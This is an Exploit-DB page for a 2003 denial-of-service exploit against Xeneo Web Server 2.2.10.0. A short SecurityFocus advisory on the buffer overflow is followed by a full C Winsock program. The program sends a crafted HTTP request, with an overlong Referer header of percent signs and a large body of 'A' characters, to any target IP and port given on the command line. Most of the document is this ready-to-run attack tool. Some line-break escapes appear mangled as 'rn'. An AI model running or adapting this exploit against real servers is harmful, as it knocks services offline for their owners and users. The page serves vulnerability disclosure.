https://www.exploit-db.com/exploits/22527

漏洞细节尚未披露

/*
source: http://www.securityfocus.com/bid/7410/info

Xeneo web server has been reported prone to an undisclosed buffer overflow vulnerability.

It has been reported that a specifically crafted HTTP request containing malicious HTTP header information will trigger this condition.

Although unconfirmed, this issue may be exploited to execute arbitrary code.

It should also be noted, that although this vulnerability has been reported to affect Xeneo web server version 2.2.10.0 previous versions may also be vulnerable. 
*/

/* Xeneo Web Server 2.2.2.10.0 DoS 
 *
 * Vulnerable systems:
 * Xeneo Web Server 2.2.10.0
 * Vendor:
 * http://www.northernsolutions.com
 *
 * Written and found by badpack3t <[email protected]>
 * For SP Research Labs
 * 04/23/2003
 * 
 * www.security-protocols.com
 *
 * usage: 
 * sp-xeneo2 <targetip> [targetport] (default is 80)
 *
 * big ups 2: 
 * c0nnie, ^Foster, ac1djazz, mp, regulate, stripey, dvdman, hex_, inet
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

"GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1rn"
"Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%rn"
"Content-Type: application/x-www-form-urlencodedrn"
"Connection: Keep-Alivern"
"Cookie: VARIABLE=SPLABS; path=/rn"
"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)rn"
"Variable: resultrn"
"Host: localhostrn"
"Content-length:     513rn"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/pngrn"
"Accept-Encoding: gziprn"
"Accept-Language: enrn"
"Accept-Charset: iso-8859-1,*,utf-8rnrnrn"
"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArn";

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent 		*pTarget;
	struct sockaddr_in 	sock;
	char *target, buffer[30000];
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("Xeneo Web Server 2.2.10.0 DoSrn <[email protected]>rnrn", argv[0]);
		printf("Tool Usage:rn %s <targetip> [targetport] (default is 80)rnrn", argv[0]);
		printf("www.security-protocols.comrnrn", argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];

	//for default web attacks
	port = 80;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 512;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!rn");
		exit(1);
	}

	printf("Resolving Hostnames...n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failedn", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.n");
		exit(1);
	}

	printf("Connected!...n");
	printf("Sending Payload...n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payloadrn");
		closesocket(mysocket);
		exit(1);
	}

	printf("Remote Webserver has been DoS'ed rn");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}